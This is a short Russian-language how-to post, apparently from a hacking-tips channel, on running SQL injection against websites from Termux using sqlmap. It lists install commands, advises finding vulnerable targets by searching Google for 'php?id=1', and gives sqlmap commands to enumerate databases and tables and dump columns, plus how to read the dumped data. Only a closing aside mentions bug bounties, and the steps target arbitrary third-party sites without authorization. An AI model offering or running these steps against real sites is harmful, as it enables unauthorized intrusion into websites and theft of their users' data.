Проводим SQL-инъекцию из под Termux
Life-Hack [Жизнь-Взлом]/ХакингВсем привет! Сегодня мы поговорим про то, что такое SQL-инъекция и как провести эту атаку на сайт с помощью Termux. Для этого мы будет использовать утилиту SQLmap.
Установка
apt update -y && apt upgrade -y && apt install python2 git -y
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Находим уязвимый сайт
Подобного рода уязвимости остались на морально устаревших сайтах написанных на морально устаревшем ЯПе — PHP. Их очень легко найти, если вбить в Google "php?id=1".
Вот пример уязвимого сайта:
Запуск
python2 sqlmap.py -u <url уязвимого веб-сайта> --dbs
А вот и базы данных:
python2 sqlmap.py -u <url уязвимого веб-сайта> -D <база данных> -tables
Смотрим все таблицы в этой БД:
python2 sqlmap.py -u <url уязвимого веб-сайта> -D <база данных> -T <таблица> -С <колонка> --dump
Делаем дамп определенной колонки в таблице:
Как посмотреть дамп?
(пробел).sqlmap
cd output
cd "название папки"
cat "название файла"
Резюмируя
Эту статью ни в коем случае нельзя назвать исчерпывающим материалом по теме SQL-инъекций.
Если вы хотите глубже погрузиться в тему SQL-инъекций, то вот пару статей с хабра:
И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках
Методы обхода защитных средств веб-приложений при эксплуатации SQL-инъекций
Если интересно больше узнать про SQLmap (Оф. статья с гитхаба на Eng):
https://github.com/sqlmapproject/sqlmap/wiki/Introduction
Про White Hat хакеров
Многие сайты, несмотря на огромное распространение этой проблемы, все еще имеют подобные уязвимости, а потому это все-еще хороший шанс заработать, ибо за нахождение подобных дыр платят нормальные деньги. Просто откройте Google и почитайте про "Bug Bounty".
НО! Искать эти уязвимости на каждом сайте по-отдельности — это дело максимально неблагодарное. Для этого зачастую пишутся веб-краулеры, которые бегают по интернету и ищут уязвимости.
Termux - one 🤍